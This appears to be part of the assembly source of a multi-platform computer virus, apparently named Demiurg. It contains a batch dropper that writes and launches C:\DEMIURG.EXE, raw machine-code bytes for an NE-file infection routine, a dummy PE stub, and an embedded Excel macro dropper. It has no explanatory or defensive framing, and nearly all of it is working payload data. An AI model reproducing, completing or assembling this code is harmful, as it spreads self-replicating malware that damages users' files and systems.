db "@echo off", 0Dh, 0Ah
db "set overlay=%0", 0Dh, 0Ah
db "if not exist %overlay% set overlay=%0.BAT", 0Dh, 0Ah
db "echo "
db ">C:\DEMIURG.EXE"
db 0Dh, 0Ah
db "C:\DEMIURG.EXE %overlay%", 0Dh, 0Ah
db "set overlay=", 0Dh, 0Ah
db 1Ah ; end of text file
NE_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Eh, 081h
db 0C6h, 094h, 000h, 08Ch, 0C0h, 00Eh, 01Fh, 016h
db 007h, 0FCh, 0B9h, 02Eh, 000h, 081h, 0ECh, 02Eh
db 002h, 08Bh, 0ECh, 08Bh, 0FDh, 0F3h, 0A4h, 016h
db 016h, 007h, 01Fh, 089h, 046h, 004h, 0B8h, 002h
db 03Dh, 08Dh, 056h, 021h, 0CDh, 021h, 072h, 05Fh
db 093h, 0B8h, 002h, 042h, 0B9h, 0FFh, 0FFh, 0BAh
dw -dropper_size
db 0CDh, 021h, 089h, 05Eh, 00Eh, 0B4h
db 03Ch, 033h, 0C9h, 08Dh, 056h, 012h, 0CDh, 021h
db 072h, 03Eh, 089h, 046h, 010h, 0B9h
dw (dropper_size/512)
db 051h, 0B4h, 03Fh, 08Bh, 05Eh, 00Eh, 0B9h, 000h
db 002h, 08Dh, 056h, 02Eh, 0CDh, 021h, 0B4h, 040h
db 08Bh, 05Eh, 010h, 0B9h, 000h, 002h, 08Dh, 056h
db 02Eh, 0CDh, 021h, 059h, 0E2h, 0E2h, 0B4h, 03Eh
db 08Bh, 05Eh, 00Eh, 0CDh, 021h, 0B4h, 03Eh, 08Bh
db 05Eh, 010h, 0CDh, 021h, 0B8h, 000h, 04Bh, 08Bh
db 0DDh, 08Dh, 057h, 012h, 0CDh, 021h, 0EBh, 007h
db 0B4h, 03Eh, 08Bh, 05Eh, 00Eh, 0CDh, 021h, 081h
db 0C4h, 02Eh, 002h, 007h, 01Fh, 061h, 068h
NE_start_IP dw 0
db 0C3h, 000h, 000h, 080h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 043h, 03Ah, 05Ch, 044h
db 045h, 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h
db 058h, 045h, 000h
our_filename db 13 dup(0)
size_NE_virus_code EQU ($ - NE_virus_code)
dummy_PE:
db 04Dh, 05Ah, 040h, 000h, 001h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 001h, 0E6h, 005h, 000h
db 042h, 04Ah, 000h, 000h, 0F0h, 0FFh, 040h, 0E6h
db 023h, 000h, 040h, 000h, 000h, 000h, 050h, 045h
db 000h, 000h, 04Ch, 001h, 001h, 0E6h, 00Dh, 000h
db 0E0h, 000h, 08Eh, 081h, 00Bh, 001h, 0E6h, 00Eh
db 000h, 068h, 010h, 0E6h, 00Ch, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 001h, 0E6h, 007h, 000h, 003h, 000h, 00Ah, 0E6h
db 006h, 000h, 060h, 000h, 000h, 000h, 002h, 0E6h
db 006h, 000h, 002h, 0E6h, 005h, 000h, 010h, 000h
db 000h, 020h, 0E6h, 004h, 000h, 010h, 000h, 000h
db 010h, 0E6h, 006h, 000h, 010h, 0E6h, 00Ch, 000h
db 010h, 000h, 000h, 054h, 0E6h, 073h, 000h, 02Eh
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 000h
db 050h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 042h, 000h, 000h, 000h, 002h, 0E6h, 00Eh, 000h
db 060h, 000h, 000h, 0E0h, 0E6h, 0A0h, 000h, 028h
db 010h, 0E6h, 00Ah, 000h, 038h, 010h, 000h, 000h
db 030h, 010h, 0E6h, 016h, 000h, 046h, 010h, 0E6h
db 006h, 000h, 046h, 010h, 0E6h, 006h, 000h, 04Bh
db 045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
db 064h, 06Ch, 06Ch, 0E6h, 004h, 000h, 045h, 078h
db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
db 073h, 0E6h, 00Dh, 000h, 06Ah, 000h, 0FFh, 015h
db 030h, 010h, 040h, 000h
dummy_PE_size EQU ($ - dummy_PE)
macro_dropper:
db 0D0h, 0CFh, 011h, 0E0h, 0A1h, 0B1h, 01Ah, 0E1h
db 0E6h, 010h, 000h, 03Eh, 000h, 003h, 000h, 0FEh
db 0FFh, 009h, 000h, 006h, 0E6h, 00Bh, 000h, 001h
db 000h, 000h, 000h, 001h, 0E6h, 008h, 000h, 010h
db 000h, 000h, 002h, 000h, 000h, 000h, 002h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0E6h, 008h
db 000h, 0E6h, 0FFh, 0FFh, 0E6h, 0B1h, 0FFh, 0FDh
db 0FFh, 0FFh, 0FFh, 009h, 000h, 000h, 000h, 013h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 005h
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 007h
db 000h, 000h, 000h, 008h, 000h, 000h, 000h, 00Ah
db 000h, 000h, 000h, 019h, 000h, 000h, 000h, 00Bh
db 000h, 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh
db 000h, 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh
db 000h, 000h, 000h, 010h, 000h, 000h, 000h, 011h
db 000h, 000h, 000h, 012h, 000h, 000h, 000h, 014h
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 015h
db 000h, 000h, 000h, 016h, 000h, 000h, 000h, 017h
db 000h, 000h, 000h, 018h, 000h, 000h, 000h, 01Ah
db 000h, 000h, 000h, 01Dh, 000h, 000h, 000h, 01Bh
db 000h, 000h, 000h, 01Ch, 000h, 000h, 000h, 01Eh
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0FEh
db 0E6h, 0FFh, 0FFh, 0E6h, 088h, 0FFh, 052h, 000h
db 06Fh, 000h, 06Fh, 000h, 074h, 000h, 020h, 000h
db 045h, 000h, 06Eh, 000h, 074h, 000h, 072h, 000h
db 079h, 0E6h, 02Dh, 000h, 016h, 000h, 005h, 000h
db 0E6h, 008h, 0FFh, 002h, 000h, 000h, 000h, 020h
db 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h, 006h
db 000h, 046h, 0E6h, 004h, 000h, 040h, 026h, 06Ch
db 034h, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 003h, 000h, 000h
db 000h, 080h, 02Eh, 0E6h, 006h, 000h, 057h, 000h
db 06Fh, 000h, 072h, 000h, 06Bh, 000h, 062h, 000h
db 06Fh, 000h, 06Fh, 000h, 06Bh, 0E6h, 031h, 000h
db 012h, 000h, 002h, 001h, 00Dh, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 028h, 000h, 092h, 00Ah
db 0E6h, 006h, 000h, 05Fh, 000h, 056h, 000h, 042h
db 000h, 041h, 000h, 05Fh, 000h, 050h, 000h, 052h
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
db 000h, 054h, 000h, 05Fh, 000h, 043h, 000h, 055h
db 000h, 052h, 0E6h, 021h, 000h, 022h, 000h, 001h
db 001h, 001h, 000h, 000h, 000h, 00Bh, 000h, 000h
db 000h, 00Ah, 0E6h, 017h, 000h, 0A0h, 03Ch, 035h
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0E6h, 00Ch, 000h
db 056h, 000h, 042h, 000h, 041h, 0E6h, 03Bh, 000h
db 008h, 000h, 001h, 000h, 0E6h, 008h, 0FFh, 005h
db 0E6h, 017h, 000h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0E6h, 00Ch, 000h, 001h, 000h
db 000h, 000h, 002h, 000h, 000h, 000h, 003h, 000h
db 000h, 000h, 004h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 006h, 000h, 000h, 000h, 007h, 000h
db 000h, 000h, 008h, 000h, 000h, 000h, 009h, 000h
db 000h, 000h, 00Ah, 000h, 000h, 000h, 00Bh, 000h
db 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh, 000h
db 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh, 000h
db 000h, 000h, 010h, 000h, 000h, 000h, 011h, 000h
db 000h, 000h, 012h, 000h, 000h, 000h, 013h, 000h
db 000h, 000h, 014h, 000h, 000h, 000h, 015h, 000h
db 000h, 000h, 016h, 000h, 000h, 000h, 017h, 000h
db 000h, 000h, 018h, 000h, 000h, 000h, 019h, 000h
db 000h, 000h, 01Ah, 000h, 000h, 000h, 01Bh, 000h
db 000h, 000h, 01Ch, 000h, 000h, 000h, 01Dh, 000h
db 000h, 000h, 01Eh, 000h, 000h, 000h, 01Fh, 000h
db 000h, 000h, 020h, 000h, 000h, 000h, 021h, 000h
db 000h, 000h, 022h, 000h, 000h, 000h, 023h, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 025h, 000h
db 000h, 000h, 026h, 000h, 000h, 000h, 027h, 000h
db 000h, 000h, 028h, 000h, 000h, 000h, 029h, 000h
db 000h, 000h, 02Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 02Ch, 000h, 000h, 000h, 02Dh, 000h
db 000h, 000h, 02Eh, 000h, 000h, 000h, 02Fh, 000h
db 000h, 000h, 030h, 000h, 000h, 000h, 031h, 000h
db 000h, 000h, 032h, 000h, 000h, 000h, 033h, 000h
db 000h, 000h, 034h, 000h, 000h, 000h, 035h, 000h
db 000h, 000h, 036h, 000h, 000h, 000h, 037h, 000h
db 000h, 000h, 038h, 000h, 000h, 000h, 039h, 000h
db 000h, 000h, 03Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 03Ch, 000h, 000h, 000h, 03Dh, 000h
db 000h, 000h, 03Eh, 000h, 000h, 000h, 03Fh, 000h
db 000h, 000h, 040h, 000h, 000h, 000h, 041h, 000h
db 000h, 000h, 042h, 000h, 000h, 000h, 043h, 000h
db 000h, 000h, 044h, 000h, 000h, 000h, 045h, 000h
db 000h, 000h, 046h, 000h, 000h, 000h, 047h, 000h
db 000h, 000h, 048h, 000h, 000h, 000h, 049h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 04Bh, 000h
db 000h, 000h, 04Ch, 000h, 000h, 000h, 04Dh, 000h
db 000h, 000h, 04Eh, 000h, 000h, 000h, 04Fh, 000h
db 000h, 000h, 050h, 000h, 000h, 000h, 051h, 000h
db 000h, 000h, 052h, 000h, 000h, 000h, 053h, 000h
db 000h, 000h, 054h, 000h, 000h, 000h, 055h, 000h
db 000h, 000h, 056h, 000h, 000h, 000h, 057h, 000h
db 000h, 000h, 058h, 000h, 000h, 000h, 059h, 000h
db 000h, 000h, 05Ah, 000h, 000h, 000h, 05Bh, 000h
db 000h, 000h, 05Ch, 000h, 000h, 000h, 05Dh, 000h
db 000h, 000h, 05Eh, 000h, 000h, 000h, 05Fh, 000h
db 000h, 000h, 060h, 000h, 000h, 000h, 061h, 000h
db 000h, 000h, 062h, 000h, 000h, 000h, 063h, 000h
db 000h, 000h, 064h, 000h, 000h, 000h, 065h, 000h
db 000h, 000h, 066h, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 068h, 000h, 000h, 000h, 069h, 000h
db 000h, 000h, 06Ah, 000h, 000h, 000h, 06Bh, 000h
db 000h, 000h, 06Ch, 000h, 000h, 000h, 06Dh, 000h
db 000h, 000h, 06Eh, 000h, 000h, 000h, 06Fh, 000h
db 000h, 000h, 070h, 000h, 000h, 000h, 071h, 000h
db 000h, 000h, 072h, 000h, 000h, 000h, 073h, 000h
db 000h, 000h, 074h, 000h, 000h, 000h, 075h, 000h
db 000h, 000h, 076h, 000h, 000h, 000h, 077h, 000h
db 000h, 000h, 078h, 000h, 000h, 000h, 079h, 000h
db 000h, 000h, 07Ah, 000h, 000h, 000h, 07Bh, 000h
db 000h, 000h, 07Ch, 000h, 000h, 000h, 07Dh, 000h
db 000h, 000h, 07Eh, 000h, 000h, 000h, 07Fh, 000h
db 000h, 000h, 080h, 000h, 000h, 000h, 009h, 008h
db 010h, 000h, 000h, 006h, 005h, 000h, 0D3h, 010h
db 0CCh, 007h, 041h, 000h, 000h, 000h, 006h, 000h
db 000h, 000h, 0E1h, 000h, 002h, 000h, 0B0h, 004h
db 0C1h, 000h, 002h, 000h, 000h, 000h, 0E2h, 000h
db 000h, 000h, 05Ch, 000h, 070h, 000h, 001h, 000h
db 000h, 042h, 0E6h, 06Ch, 020h, 042h, 000h, 002h
db 000h, 0B0h, 004h, 061h, 001h, 002h, 000h, 000h
db 000h, 03Dh, 001h, 002h, 000h, 001h, 000h, 0D3h
db 000h, 000h, 000h, 0BAh, 001h, 014h, 000h, 011h
db 000h, 000h, 044h, 069h, 065h, 073h, 065h, 041h
db 072h, 062h, 065h, 069h, 074h, 073h, 06Dh, 061h
db 070h, 070h, 065h, 09Ch, 000h, 002h, 000h, 00Eh
db 000h, 019h, 000h, 002h, 000h, 000h, 000h, 012h
db 000h, 002h, 000h, 000h, 000h, 013h, 000h, 002h
db 000h, 000h, 000h, 0AFh, 001h, 002h, 000h, 000h
db 000h, 0BCh, 001h, 002h, 000h, 000h, 000h, 03Dh
db 000h, 012h, 000h, 0F0h, 000h, 087h, 000h, 0DCh
db 023h, 094h, 011h, 039h, 0E6h, 005h, 000h, 001h
db 000h, 058h, 002h, 040h, 000h, 002h, 000h, 000h
db 000h, 08Dh, 000h, 002h, 000h, 000h, 000h, 022h
db 000h, 002h, 000h, 000h, 000h, 00Eh, 000h, 002h
db 000h, 001h, 000h, 0B7h, 001h, 002h, 000h, 000h
db 000h, 0DAh, 000h, 002h, 000h, 000h, 000h, 031h
db 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h, 0FFh
db 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h, 001h
db 041h, 000h, 072h, 000h, 069h, 000h, 061h, 000h
db 06Ch, 000h, 031h, 000h, 01Ah, 000h, 0C8h, 000h
db 000h, 000h, 0FFh, 07Fh, 090h, 001h, 0E6h, 006h
db 000h, 005h, 001h, 041h, 000h, 072h, 000h, 069h
db 000h, 061h, 000h, 06Ch, 000h, 031h, 000h, 01Ah
db 000h, 0C8h, 000h, 000h, 000h, 0FFh, 07Fh, 090h
db 001h, 0E6h, 006h, 000h, 005h, 001h, 041h, 000h
db 072h, 000h, 069h, 000h, 061h, 000h, 06Ch, 000h
db 031h, 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h
db 0FFh, 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h
db 001h, 041h, 000h, 072h, 000h, 069h, 000h, 061h
db 000h, 06Ch, 000h, 01Eh, 004h, 01Eh, 000h, 005h
db 000h, 019h, 000h, 000h, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h, 03Bh
db 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h
db 023h, 02Ch, 023h, 023h, 030h, 01Eh, 004h, 023h
db 000h, 006h, 000h, 01Eh, 000h, 000h, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 03Bh, 05Bh, 052h, 065h, 064h, 05Dh, 05Ch
db 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h, 023h
db 02Ch, 023h, 023h, 030h, 01Eh, 004h, 024h, 000h
db 007h, 000h, 01Fh, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 02Eh, 030h, 030h, 01Eh, 004h, 029h, 000h
db 008h, 000h, 024h, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Bh, 052h, 065h, 064h
db 05Dh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 01Eh, 004h, 03Eh, 000h, 02Ah, 000h, 039h
db 000h, 000h, 05Fh, 02Dh, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 02Ch, 000h, 029h
db 000h, 027h, 000h, 000h, 05Fh, 02Dh, 02Ah, 020h
db 023h, 02Ch, 023h, 023h, 030h, 05Fh, 02Dh, 03Bh
db 05Ch, 02Dh, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 046h, 000h, 02Ch
db 000h, 041h, 000h, 000h, 05Fh, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 02Eh, 030h, 030h, 05Fh, 02Dh
db 03Bh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 01Eh, 004h, 034h
db 000h, 02Bh, 000h, 02Fh, 000h, 000h, 05Fh, 02Dh
db 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh
db 030h, 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 02Ah
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 0E6h, 00Bh
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 000h, 001h, 000h, 000h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 000h, 002h, 000h, 000h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h
db 002h, 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h
db 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 001h
db 000h, 020h, 0E6h, 00Bh, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 000h, 001h, 000h, 02Bh, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h, 000h
db 029h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F8h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 000h, 001h, 000h, 009h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F8h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 000h, 001h, 000h, 02Ch, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 02Ah, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F8h, 0E6h, 008h, 000h, 0C0h, 020h, 093h, 002h
db 004h, 000h, 010h, 080h, 003h, 0FFh, 093h, 002h
db 004h, 000h, 011h, 080h, 006h, 0FFh, 093h, 002h
db 004h, 000h, 012h, 080h, 005h, 0FFh, 093h, 002h
db 004h, 000h, 000h, 080h, 000h, 0FFh, 093h, 002h
db 004h, 000h, 013h, 080h, 004h, 0FFh, 093h, 002h
db 004h, 000h, 014h, 080h, 007h, 0FFh, 060h, 001h
db 002h, 000h, 001h, 000h, 085h, 000h, 010h, 000h
db 086h, 009h, 0E6h, 004h, 000h, 008h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 08Ch
db 000h, 004h, 000h, 031h, 000h, 02Bh, 000h, 0FCh
db 000h, 008h, 0E6h, 009h, 000h, 0FFh, 000h, 0FAh
db 003h, 008h, 000h, 0FFh, 0FFh, 040h, 000h, 000h
db 000h, 040h, 010h, 045h, 000h, 000h, 000h, 040h
db 000h, 001h, 000h, 000h, 000h, 00Ch, 000h, 040h
db 000h, 051h, 004h, 0E6h, 00Ah, 000h, 085h, 084h
db 0F7h, 0BFh, 001h, 000h, 000h, 000h, 09Ch, 084h
db 0F7h, 0BFh, 000h, 000h, 040h, 000h, 001h, 000h
db 000h, 000h, 038h, 0C6h, 062h, 0E6h, 005h, 000h
db 001h, 0E6h, 007h, 000h, 005h, 040h, 000h, 080h
db 002h, 094h, 0F7h, 0BFh, 000h, 000h, 040h, 000h
db 004h, 000h, 000h, 000h, 0E0h, 006h, 09Ch, 000h
db 00Ah, 000h, 000h, 000h, 020h, 000h, 000h, 000h
db 0FAh, 07Eh, 070h, 030h, 00Ah, 000h, 000h, 000h
db 00Ah, 000h, 000h, 000h, 007h, 00Ch, 000h, 000h
db 001h, 000h, 000h, 000h, 0E8h, 006h, 09Ch, 000h
db 0B4h, 0C5h, 062h, 0E6h, 00Dh, 000h, 0E6h, 008h
db 0FFh, 09Ch, 030h, 075h, 0E6h, 005h, 000h, 069h
db 000h, 075h, 000h, 0FFh, 0FFh, 0FFh, 0E7h, 0E6h
db 004h, 000h, 05Ch, 000h, 063h, 000h, 005h, 000h
db 000h, 000h, 05Ch, 000h, 064h, 000h, 065h, 000h
db 06Dh, 000h, 003h, 0E6h, 007h, 000h, 028h, 0D0h
db 09Dh, 030h, 0E6h, 008h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 014h, 000h, 002h, 007h, 002h, 002h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 003h, 000h, 000h
db 000h, 070h, 000h, 07Eh, 030h, 0C3h, 07Ch, 070h
db 030h, 004h, 000h, 000h, 000h, 004h, 0E6h, 007h
db 000h, 001h, 000h, 000h, 000h, 04Eh, 087h, 075h
db 000h, 082h, 0D8h, 07Eh, 030h, 003h, 000h, 000h
db 000h, 003h, 0E6h, 00Bh, 000h, 061h, 07Ah, 070h
db 030h, 0D4h, 006h, 09Ch, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 00Ah, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 0D4h, 006h, 09Ch
db 000h, 00Ah, 0E6h, 00Bh, 000h, 028h, 0D0h, 09Dh
db 030h, 0E6h, 008h, 000h, 002h, 000h, 000h, 000h
db 0FFh, 003h, 000h, 000h, 001h, 000h, 000h, 000h
db 001h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
db 020h, 010h, 000h, 000h, 018h, 0E6h, 007h, 000h
db 084h, 0F6h, 053h, 030h, 05Ch, 0C5h, 062h, 000h
db 05Dh, 0E6h, 007h, 000h, 002h, 000h, 0C8h, 030h
db 000h, 000h, 0C5h, 030h, 0E6h, 004h, 000h, 061h
db 07Ah, 070h, 030h, 04Ch, 087h, 075h, 000h, 004h
db 000h, 000h, 000h, 07Eh, 00Eh, 002h, 002h, 0E1h
db 03Ch, 06Dh, 030h, 016h, 000h, 0C8h, 030h, 0D3h
db 000h, 000h, 000h, 09Eh, 0C5h, 062h, 000h, 0FCh
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0CDh
db 015h, 004h, 030h, 000h, 000h, 0C5h, 030h, 004h
db 02Ah, 0C8h, 030h, 039h, 015h, 000h, 030h, 007h
db 00Ch, 000h, 000h, 001h, 000h, 000h, 000h, 0D4h
db 006h, 09Ch, 000h, 00Ah, 000h, 000h, 000h, 0A0h
db 0C5h, 062h, 000h, 00Ah, 000h, 000h, 000h, 0D0h
db 006h, 09Ch, 0E6h, 005h, 000h, 0A0h, 0C7h, 062h
db 000h, 05Dh, 0E6h, 007h, 000h, 08Eh, 08Fh, 00Fh
db 030h, 0E6h, 004h, 000h, 09Ch, 0C5h, 062h, 000h
db 00Bh, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 070h
db 006h, 09Ch, 000h, 0DCh, 0C7h, 062h, 000h, 004h
db 000h, 000h, 000h, 00Bh, 000h, 057h, 000h, 0E4h
db 000h, 068h, 000h, 072h, 000h, 075h, 000h, 06Eh
db 000h, 067h, 000h, 020h, 000h, 05Bh, 000h, 030h
db 000h, 05Dh, 000h, 000h, 000h, 05Fh, 000h, 000h
db 000h, 001h, 000h, 008h, 000h, 09Ah, 00Dh, 0E6h
db 004h, 000h, 0AEh, 082h, 070h, 030h, 007h, 00Ch
db 000h, 000h, 001h, 000h, 000h, 000h, 04Ch, 087h
db 075h, 000h, 004h, 000h, 000h, 000h, 080h, 0D8h
db 07Eh, 030h, 004h, 000h, 000h, 000h, 0AEh, 082h
db 070h, 030h, 007h, 00Ch, 000h, 000h, 001h, 000h
db 000h, 000h, 064h, 000h, 098h, 000h, 002h, 000h
db 000h, 000h, 065h, 010h, 000h, 030h, 064h, 000h
db 098h, 000h, 096h, 06Ah, 054h, 030h, 004h, 000h
db 000h, 000h, 0D9h, 010h, 000h, 030h, 096h, 06Ah
db 054h, 030h, 052h, 070h, 054h, 030h, 0C2h, 0C8h
db 010h, 030h, 096h, 01Ah, 09Ah, 000h, 050h, 000h
db 098h, 000h, 065h, 010h, 000h, 030h, 050h, 000h
db 098h, 000h, 096h, 01Ah, 09Ah, 000h, 002h, 000h
db 000h, 000h, 0DDh, 088h, 00Fh, 030h, 096h, 01Ah
db 09Ah, 000h, 050h, 000h, 098h, 000h, 001h, 000h
db 000h, 000h, 060h, 01Ah, 09Ah, 0E6h, 005h, 000h
db 008h, 000h, 098h, 000h, 0FCh, 001h, 098h, 0E6h
db 009h, 000h, 0A4h, 01Ah, 09Ah, 0E6h, 00Dh, 000h
db 03Fh, 0E6h, 007h, 000h, 0B0h, 0C6h, 062h, 000h
db 039h, 086h, 00Fh, 030h, 006h, 000h, 000h, 000h
db 060h, 01Ah, 09Ah, 000h, 02Dh, 000h, 000h, 000h
db 007h, 000h, 000h, 000h, 006h, 002h, 098h, 000h
db 0DEh, 0C7h, 062h, 000h, 0DCh, 0C7h, 062h, 000h
db 008h, 000h, 098h, 000h, 007h, 000h, 000h, 000h
